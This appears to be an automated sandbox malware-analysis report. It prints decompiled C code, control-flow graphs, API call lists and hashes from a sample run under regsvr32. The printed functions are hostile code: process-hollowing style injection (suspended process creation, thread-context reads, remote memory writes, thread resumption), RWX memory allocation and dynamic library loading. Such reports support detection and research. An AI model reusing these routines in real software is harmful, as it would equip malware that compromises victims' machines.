                                                                                                                                                                                              0x04afd824
                                                                                                                                                                                              0x04afd958
                                                                                                                                                                                              0x04afd958
                                                                                                                                                                                              0x04afd82a
                                                                                                                                                                                              0x04afd833
                                                                                                                                                                                              0x04afd83c
                                                                                                                                                                                              0x04afd841
                                                                                                                                                                                              0x04afd844
                                                                                                                                                                                              0x04afd849
                                                                                                                                                                                              0x04afd945
                                                                                                                                                                                              0x04afd94b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd954
                                                                                                                                                                                              0x04afd84f
                                                                                                                                                                                              0x04afd857
                                                                                                                                                                                              0x04afd859
                                                                                                                                                                                              0x04afd85c
                                                                                                                                                                                              0x04afd86b
                                                                                                                                                                                              0x04afd876
                                                                                                                                                                                              0x04afd87c
                                                                                                                                                                                              0x04afd881
                                                                                                                                                                                              0x04afd883
                                                                                                                                                                                              0x04afd890
                                                                                                                                                                                              0x04afd898
                                                                                                                                                                                              0x04afd8a3
                                                                                                                                                                                              0x04afd8ae
                                                                                                                                                                                              0x04afd8b2
                                                                                                                                                                                              0x04afd8b4
                                                                                                                                                                                              0x04afd8bd
                                                                                                                                                                                              0x04afd8c4
                                                                                                                                                                                              0x04afd8c9
                                                                                                                                                                                              0x04afd8cb
                                                                                                                                                                                              0x04afd8d0
                                                                                                                                                                                              0x04afd8d6
                                                                                                                                                                                              0x04afd8d8
                                                                                                                                                                                              0x04afd8d8
                                                                                                                                                                                              0x04afd8d9
                                                                                                                                                                                              0x04afd8d9
                                                                                                                                                                                              0x04afd8df
                                                                                                                                                                                              0x04afd8df
                                                                                                                                                                                              0x04afd8e2
                                                                                                                                                                                              0x04afd8e2
                                                                                                                                                                                              0x04afd898
                                                                                                                                                                                              0x04afd8e9
                                                                                                                                                                                              0x04afd8ed
                                                                                                                                                                                              0x04afd8ef
                                                                                                                                                                                              0x04afd8f8
                                                                                                                                                                                              0x04afd8f8
                                                                                                                                                                                              0x04afd8fe
                                                                                                                                                                                              0x04afd906
                                                                                                                                                                                              0x04afd909
                                                                                                                                                                                              0x04afd911
                                                                                                                                                                                              0x04afd911
                                                                                                                                                                                              0x04afd914
                                                                                                                                                                                              0x04afd915
                                                                                                                                                                                              0x04afd91b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd91b
                                                                                                                                                                                              0x04afd924
                                                                                                                                                                                              0x04afd927
                                                                                                                                                                                              0x04afd928
                                                                                                                                                                                              0x04afd92d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd933
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd933
                                                                                                                                                                                              0x04afd933
                                                                                                                                                                                              0x04afd936
                                                                                                                                                                                              0x04afd93c
                                                                                                                                                                                              0x04afd940

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                                • Part of subcall function 04AFBC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 04AFBCC6
                                                                                                                                                                                                • Part of subcall function 04AFD959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 04AFD9BB
                                                                                                                                                                                                • Part of subcall function 04AFD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 04AFDA04
                                                                                                                                                                                                • Part of subcall function 04AFD959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 04AFDA21
                                                                                                                                                                                                • Part of subcall function 04AFD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 04AFDA42
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 04AFD8B4
                                                                                                                                                                                                • Part of subcall function 04AFDA57: ResumeThread.KERNELBASE(?,04AFD8C2,?,?,00000001), ref: 04AFDA5F
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 04AFD8DF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2212882986-0
                                                                                                                                                                                              • Opcode ID: 3f5b8d17b9796315b735cc25000b86cf25c88742b0738b994815e4a184469a53
                                                                                                                                                                                              • Instruction ID: d295128d05f2c2eb11879d755f76e3d26f00891242e591580fcd923b1abf1b01
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f5b8d17b9796315b735cc25000b86cf25c88742b0738b994815e4a184469a53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 47416D71A002099FDB22DFE5DD84AEEB7F9FF48315F1040A9F606A7251DB74A9418B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AC0340 Relevance: 3.1, APIs: 2, Instructions: 86memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 372 4ac0340-4ac0368 373 4ac036e-4ac0374 372->373 374 4ac0430-4ac0433 372->374 375 4ac0377-4ac037e 373->375 375->374 376 4ac0384-4ac03a6 375->376 378 4ac03a8-4ac03b1 376->378 379 4ac0422-4ac042b 376->379 380 4ac03b4-4ac03ba 378->380 379->375 380->379 381 4ac03bc-4ac03c4 380->381 382 4ac03c6-4ac0415 VirtualProtect * 2 381->382 383 4ac0417-4ac0420 381->383 382->374 383->380
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 04AC03DB
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 04AC0413
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4aa0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                              • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction ID: 57e7315d5a89b9cb1e121afcbd1a219a27ba1690f97ba4f7c1dd87e66c9db337
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23419774A04209EFCB48CF88C990BEEB7B1FF88314F148199E915AB355D775AA41CF94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF64EF Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x4b0f818; // 0x4c2f8b0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E04AF8BC9();
				E04AF9591();
				 *0x4b0f830 = _a4;
				E04B03CD5(_a4);
				 *_t49 = 0xf43;
				 *0x4b0f818 = E04AFF05C(0x4b0ca50, 0x138);
				 *_t49 = 0x111;
				_t23 = E04AF9DF2(0x4b0ca50);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E04AF8BAF();
					 *_t49 = 0x40e;
					_t28 = E04AF9CB5(E04AF109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x4b0f828 = E04AFF05C(0x4b0cbb8, _t48);
						E04AF6370(_t48, __eflags);
						E04AF8BF4( &_a8, 0xfffffffe);
						_t36 =  *0x4b0f818; // 0x4c2f8b0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E04AF6298, 0, 0,  &_v8);
					 *0x4b0f83c = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E04AF8BAF();
				goto L3;
			}













                                                                                                                                                                                              0x04af64f2
                                                                                                                                                                                              0x04af64f7
                                                                                                                                                                                              0x04af65db
                                                                                                                                                                                              0x04af65df
                                                                                                                                                                                              0x04af65d4
                                                                                                                                                                                              0x04af65d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af65d6
                                                                                                                                                                                              0x04af65e1
                                                                                                                                                                                              0x04af65eb
                                                                                                                                                                                              0x04af6556
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af6556
                                                                                                                                                                                              0x04af64fd
                                                                                                                                                                                              0x04af6502
                                                                                                                                                                                              0x04af650b
                                                                                                                                                                                              0x04af6510
                                                                                                                                                                                              0x04af651a
                                                                                                                                                                                              0x04af652b
                                                                                                                                                                                              0x04af6530
                                                                                                                                                                                              0x04af6537
                                                                                                                                                                                              0x04af653c
                                                                                                                                                                                              0x04af653e
                                                                                                                                                                                              0x04af6541
                                                                                                                                                                                              0x04af654d
                                                                                                                                                                                              0x04af654e
                                                                                                                                                                                              0x04af655a
                                                                                                                                                                                              0x04af655f
                                                                                                                                                                                              0x04af656e
                                                                                                                                                                                              0x04af6573
                                                                                                                                                                                              0x04af6576
                                                                                                                                                                                              0x04af6578
                                                                                                                                                                                              0x04af6581
                                                                                                                                                                                              0x04af658c
                                                                                                                                                                                              0x04af6591
                                                                                                                                                                                              0x04af659c
                                                                                                                                                                                              0x04af65a1
                                                                                                                                                                                              0x04af65ab
                                                                                                                                                                                              0x04af65ab
                                                                                                                                                                                              0x04af65c5
                                                                                                                                                                                              0x04af65c8
                                                                                                                                                                                              0x04af65cb
                                                                                                                                                                                              0x04af65d0
                                                                                                                                                                                              0x04af65d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af65d2
                                                                                                                                                                                              0x04af6550
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,04AF6502), ref: 04AF8BD2
                                                                                                                                                                                                • Part of subcall function 04AFF05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,04B0CA50,?,04AF652B,?), ref: 04AFF07E
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 04AF6541
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04AF6298,00000000,00000000,?), ref: 04AF65C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 607385197-0
                                                                                                                                                                                              • Opcode ID: c379da720500c8dd43712a74abd95a4797497ac692762218d68d67c3fd5b57e2
                                                                                                                                                                                              • Instruction ID: 25693371b740eb34305d01c9394546becdc147c4b04e37213a7a9325fc8f3705
                                                                                                                                                                                              • Opcode Fuzzy Hash: c379da720500c8dd43712a74abd95a4797497ac692762218d68d67c3fd5b57e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2135B1614204EBEB14BFF4DD05AAD37E8EB14315F10852AB719DB1D0EB78F9818B61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04ABF9D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 420 4abf9d0-4abfa1b call 4abfdc0 423 4abfa2a-4abfa5a call 4abf7a0 VirtualAlloc 420->423 424 4abfa1d-4abfa27 call 4abfdc0 420->424 424->423
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04ABFA54
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4aa0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID: VirtualAlloc
                                                                                                                                                                                              • API String ID: 4275171209-164498762
                                                                                                                                                                                              • Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction ID: 8d6c86e0760da0c911086535f44f3092d1055fcf1c6a0362d35cc4034abdb904
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E111260D082C9DEFF01DBE898097EFBFB55F11708F084098E5846B282D6BA575887F6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFF05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E04AFF05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E04AF9DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E04AFF011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E04AF8B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                                              0x04aff05f
                                                                                                                                                                                              0x04aff062
                                                                                                                                                                                              0x04aff068
                                                                                                                                                                                              0x04aff06a
                                                                                                                                                                                              0x04aff06f
                                                                                                                                                                                              0x04aff071
                                                                                                                                                                                              0x04aff07b
                                                                                                                                                                                              0x04aff07c
                                                                                                                                                                                              0x04aff08b
                                                                                                                                                                                              0x04aff07e
                                                                                                                                                                                              0x04aff07e
                                                                                                                                                                                              0x04aff07e
                                                                                                                                                                                              0x04aff08f
                                                                                                                                                                                              0x04aff096
                                                                                                                                                                                              0x04aff09c
                                                                                                                                                                                              0x04aff09c
                                                                                                                                                                                              0x04aff0a1
                                                                                                                                                                                              0x04aff0ac

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,04B0CA50,?,04AF652B,?), ref: 04AFF07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,04B0CA50,?,04AF652B,?), ref: 04AFF08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: d4e02b229f27662d95ddf75e46a74f08c55859b31f4cd5f24584bcd76b80d76b
                                                                                                                                                                                              • Instruction ID: e0c8b0ee8d1daca40b5b869a4b8cdd26a7de2a3457d083294f38abbdda6a26fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4e02b229f27662d95ddf75e46a74f08c55859b31f4cd5f24584bcd76b80d76b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DF0A771300214AFE714ABE9ED848AAB3ECDF58255720403BFB06D3250FAB0EE40C6A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFC8C9 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E04AFC8C9(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E04AFC79E(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E04AFC7F5(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E04AF8BF4( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x4b0f820; // 0x4c2faa0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x4b0f820; // 0x4c2faa0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x4b0f820; // 0x4c2faa0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                                              0x04afc8d0
                                                                                                                                                                                              0x04afc8d2
                                                                                                                                                                                              0x04afc8d9
                                                                                                                                                                                              0x04afc8db
                                                                                                                                                                                              0x04afc8de
                                                                                                                                                                                              0x04afc8e3
                                                                                                                                                                                              0x04afc8e8
                                                                                                                                                                                              0x04afc8f2
                                                                                                                                                                                              0x04afc8f5
                                                                                                                                                                                              0x04afc8f8
                                                                                                                                                                                              0x04afc8fd
                                                                                                                                                                                              0x04afc8ff
                                                                                                                                                                                              0x04afc905
                                                                                                                                                                                              0x04afc965
                                                                                                                                                                                              0x04afc96d
                                                                                                                                                                                              0x04afc973
                                                                                                                                                                                              0x04afc97a
                                                                                                                                                                                              0x04afc980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc981
                                                                                                                                                                                              0x04afc90a
                                                                                                                                                                                              0x04afc90b
                                                                                                                                                                                              0x04afc90c
                                                                                                                                                                                              0x04afc90d
                                                                                                                                                                                              0x04afc90e
                                                                                                                                                                                              0x04afc90f
                                                                                                                                                                                              0x04afc910
                                                                                                                                                                                              0x04afc911
                                                                                                                                                                                              0x04afc916
                                                                                                                                                                                              0x04afc918
                                                                                                                                                                                              0x04afc91d
                                                                                                                                                                                              0x04afc91e
                                                                                                                                                                                              0x04afc928
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc92c
                                                                                                                                                                                              0x04afc958
                                                                                                                                                                                              0x04afc958
                                                                                                                                                                                              0x04afc960
                                                                                                                                                                                              0x04afc963
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc963
                                                                                                                                                                                              0x04afc92e
                                                                                                                                                                                              0x04afc92e
                                                                                                                                                                                              0x04afc931
                                                                                                                                                                                              0x04afc934
                                                                                                                                                                                              0x04afc934
                                                                                                                                                                                              0x04afc937
                                                                                                                                                                                              0x04afc939
                                                                                                                                                                                              0x04afc943
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc948
                                                                                                                                                                                              0x04afc949
                                                                                                                                                                                              0x04afc94c
                                                                                                                                                                                              0x04afc951
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc953
                                                                                                                                                                                              0x04afc957
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc957
                                                                                                                                                                                              0x04afc986

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AFC79E: GetCurrentThread.KERNEL32 ref: 04AFC7B1
                                                                                                                                                                                                • Part of subcall function 04AFC79E: OpenThreadToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7B8
                                                                                                                                                                                                • Part of subcall function 04AFC79E: GetLastError.KERNEL32(?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7BF
                                                                                                                                                                                                • Part of subcall function 04AFC79E: OpenProcessToken.ADVAPI32(00000000,?,?,04AFC8E3,00000000,04AF0000), ref: 04AFC7E4
                                                                                                                                                                                                • Part of subcall function 04AFC7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04AF0000,00000000,00000000,?,04AFC876,00000000,00000000,?,04AFC89F), ref: 04AFC810
                                                                                                                                                                                                • Part of subcall function 04AFC7F5: GetLastError.KERNEL32(?,04AFC876,00000000,00000000,?,04AFC89F,00001644,?,04AFDFCE), ref: 04AFC817
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04AF0000), ref: 04AFC96D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1806447117-0
                                                                                                                                                                                              • Opcode ID: a47b00787e9ebbb97c439ee13f6082fd1155598cb50d613f555f6cbba93cad71
                                                                                                                                                                                              • Instruction ID: 1e92bab3aa9cdc61c73e0d8c5e84f1f862fef3ca5558ea2ae1da40310ee3d0c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a47b00787e9ebbb97c439ee13f6082fd1155598cb50d613f555f6cbba93cad71
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC214F72A00209AFDB20DFEADCC5AAEB7F8FF48720B504469F611E7151D774AA419B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF6298 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF6298(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E04AF6412();
				GetOEMCP();
				_t13 = E04AFDF3D(__fp0); // executed
				 *0x4b0f81c = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x4b0f81c; // 0x4c2fbe8
					_t2 = _t14 + 0x224; // 0x4af0000
					E04B03BD5( *_t2);
					_t26 =  *0x4b0f81c; // 0x4c2fbe8
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x4af0000, executed
						_t26 =  *_t7;
						_t16 = E04AFD804( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x4b0f81c; // 0x4c2fbe8
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E04AF35A1();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x4b0f81c; // 0x4c2fbe8
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E04AF611B(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











                                                                                                                                                                                              0x04af6298
                                                                                                                                                                                              0x04af6298
                                                                                                                                                                                              0x04af629d
                                                                                                                                                                                              0x04af62a4
                                                                                                                                                                                              0x04af62a9
                                                                                                                                                                                              0x04af62b1
                                                                                                                                                                                              0x04af62ba
                                                                                                                                                                                              0x04af62c0
                                                                                                                                                                                              0x04af62c5
                                                                                                                                                                                              0x04af62cb
                                                                                                                                                                                              0x04af62d0
                                                                                                                                                                                              0x04af62d6
                                                                                                                                                                                              0x04af62d7
                                                                                                                                                                                              0x04af62e1
                                                                                                                                                                                              0x04af62eb
                                                                                                                                                                                              0x04af62eb
                                                                                                                                                                                              0x04af62f1
                                                                                                                                                                                              0x04af62f6
                                                                                                                                                                                              0x04af62f8
                                                                                                                                                                                              0x04af62fd
                                                                                                                                                                                              0x04af631a
                                                                                                                                                                                              0x04af6321
                                                                                                                                                                                              0x04af6328
                                                                                                                                                                                              0x04af6328
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af632a
                                                                                                                                                                                              0x04af6323
                                                                                                                                                                                              0x04af6323
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af6323
                                                                                                                                                                                              0x04af62ff
                                                                                                                                                                                              0x04af6305
                                                                                                                                                                                              0x04af6305
                                                                                                                                                                                              0x04af630a
                                                                                                                                                                                              0x04af6311
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af6313
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af6313
                                                                                                                                                                                              0x04af62e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af62e3
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetOEMCP.KERNEL32 ref: 04AF629D
                                                                                                                                                                                                • Part of subcall function 04AFDF3D: GetCurrentProcessId.KERNEL32 ref: 04AFDF64
                                                                                                                                                                                                • Part of subcall function 04AFDF3D: GetLastError.KERNEL32 ref: 04AFE05E
                                                                                                                                                                                                • Part of subcall function 04AFDF3D: GetSystemMetrics.USER32(00001000), ref: 04AFE06E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentErrorLastMetricsProcessSystem
